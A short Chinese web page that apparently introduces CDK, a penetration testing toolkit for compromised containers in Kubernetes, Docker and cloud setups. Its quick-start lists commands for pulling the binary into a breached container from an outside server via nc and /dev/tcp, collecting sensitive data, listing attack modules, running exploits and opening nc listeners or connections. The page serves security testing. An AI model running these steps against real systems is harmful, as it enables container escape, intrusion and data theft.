简介
CDK(Cloud Defense Kit)是一款为容器环境定制的渗透测试工具,在已攻陷的容器内部提供零依赖的常用命令及PoC/EXP,专注于检测和利用Kubernetes、Docker及云环境中的安全漏洞。它可以模拟真实攻击场景,帮助用户识别集群配置、权限管理以及容器镜像中的安全问题。CDK支持多种云平台和容器化环境,提供了诸如容器逃逸、权限提升、敏感信息泄露检测等功能,适用于安全研究人员和运维人员进行安全测试和防护评估。
文档:CDK Home CN · cdk-team/CDK Wiki
演示视频
快速使用
- 向容器内下载CDK工具,不使用wget和curl
- 公网服务器执行:
nc -lvp 999 < cdk - 容器内部执行:
cat < /dev/tcp/<公网机IP>/<公网机监听端口> > cdk
- 公网服务器执行:
- 对环境的敏感信息进行收集
./cdk_linux_amd64_upx eva –full
- 列出工具的攻击模块
./cdk_linux_amd64_upx run –list
- 执行指定EXP
./cdk run <script-name> [options]
- 模拟执行nc命令
监听
cdk nc -l -v -p <port>
连接
cdk nc -h <host> -p <port>
声明:本站所有文章,如无特殊说明或标注,均为本站原创发布。任何个人或组织,在未征得本站同意时,禁止复制、盗用、采集、发布本站内容到任何网站、书籍等各类媒体平台。如若本站内容侵犯了原著者的合法权益,可联系我们进行处理。
